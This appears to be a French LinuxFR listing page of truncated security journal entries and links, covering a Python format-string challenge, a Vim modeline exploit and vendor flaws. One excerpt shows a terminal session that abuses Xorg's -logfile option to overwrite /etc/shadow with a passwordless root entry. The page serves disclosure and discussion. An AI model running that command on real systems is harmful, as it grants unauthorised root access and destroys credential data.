Journal Chaînes de formatage et sécurité en python (solution au "Petit Défi Python")
La semaine dernière, je vous proposais un défi de cybersécurité en python. Si vous ne l'avez pas encore vu, allez tenter votre chance sur Github avant de lire la suite de ce journal, ce sera plus intéressant.
La vulnérabilité
La première étape du défi était de trouver où était la faille de sécurité. L'application étant toute simple, ce n'était pas très difficile. Le script python contient les deux lignes suivantes:
to_format = f"Printing a {self.width}-character wide box: [Age:
(…)
Lien Intel's Mitigation For CVE-2019-14615 Graphics Vulnerability Obliterates Gen7 iGPU Performance
Journal Petit défi Python
Aujourd’hui, je propose à ceux qui s’ennuient un petit défi de cybersécurité en Python.
Voici un script Python qui semble trivial, et qui contient une faille de sécurité :
#!/usr/bin/env python3
import random
SECRET = ''.join(random.choice("0123456789") for i in range(64))
class Sandbox:
def ask_age(self):
self.age = input("How old are you ? ")
self.width = input("How
(…)
Lien Failles dans Firefox, la cuvée de Septembre (MFSA 2019-25 et 2019-27)
Lien failles intel en pagaille
Journal Linux Mint, Mate et grosse faille foireuse au niveau du verrouillage d´écran
J'ai trouvé ça tellement énorme que je vais vous relater l'aventure.
Un collègue a un laptop sous Linux Mint (ubuntu based il me semble) avec le bureau Mate. Aucune idée du desktop Manager. Tout à l'heure ont s´était posé ensemble dans une salle pour bosser sur un sujet commun [1]. On termine, il rabat l´écran de son laptop, qui vérouille la session, jusque là tout va bien. Arrivé à sa place de travail il redéploie l´écran, voit la mire l'invitant (…)
Journal [FAILLE] Code execution dans Vim via un fichier malicieux forgé
La vulnérabilité est tombée hier:
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
Il s'agit d'execution de code, possiblement distante (merci netcat) en exploitant une //faille// dans la gestion des modeline (Fonctionnalité qui permet de configurer vim pour le buffer courant, via une ligne spécialement formaté au début du fichier)
L'astuce intéressante est que, par l'utilisation de caractères d'échappement, l'attaquant peut même rendre la ligne malicieuse invisible via cat
.
Des mitigations existent (désactiver les modelines), tout est détaillé sur la page.
Journal Réflexion d'un utilisateur de Firefox avec un processeur Intel en 2019
Bonjour nal,
Je ne peux m'empêcher de mettre en parallèle les gains ahurissants de performance de Firefox depuis un an (cf la dernière dépêche en date) avec la dégradation tout aussi ahurissante des performances Intel depuis un an.
Tandis que les développements du premier sont entièrement tendus vers les moyens d'accroître la vitesse et la réactivité du logiciel (en même temps que sa sécurité et de proposer des outils de défense de la vie privée aux utilisateurs) (…)
Journal Qualcomm corrige une faille critique dans des dizaines de puces Snapdragon
Pour continuer sur les discussions autour d'Android du moment sur LinuxFR.
Source : https://app.beebom.com/qualcomm-patches-critical-flaw-dozens-snapdragon-socs/
Traduction :
Des chercheurs du groupe NCC, une compagnie spécialisée dans la cybersécurité, ont découvert une vulnérabilité critique qui affecte des dizaines de puces Qualcomm utilisés dans les téléphones et tablettes Android.
D’après les rapports, pas moins de 46 puces Qualcomm, incluant les SD820, 835, 845, 855, 625, 636, 660, 670 sont probablement impactés par la vulnérabilité qui permet d’autoriser des attaquants potentiels à accéder à (…)
Lien Accès non autorisé à la base de données utilisateurs de Docker Hub (usernames, hashes, token)
Lien Vous avez aimé Meltdown et Spectre by Intel ! Vous allez adorer Spoiler by Intel !
Journal La faille grosse comme une maison
[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadowcat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)
Journal demain soir on finit tard
Le CVE 2018-10933 concernant la libssh est limpide : demain on reporte tout à après demain et à la place on fait les mises à jour (si si, même pour toi le petit serveur du fond de la classe qui ne fait jamais ses mises à jour à cause de /place ici une mauvaise excuse/ )
bonjour server
bonjour
je voudrais avoir un accès
vous avez besoin d'un mot de passe, $user
mais je n'en ai aucun !
(…)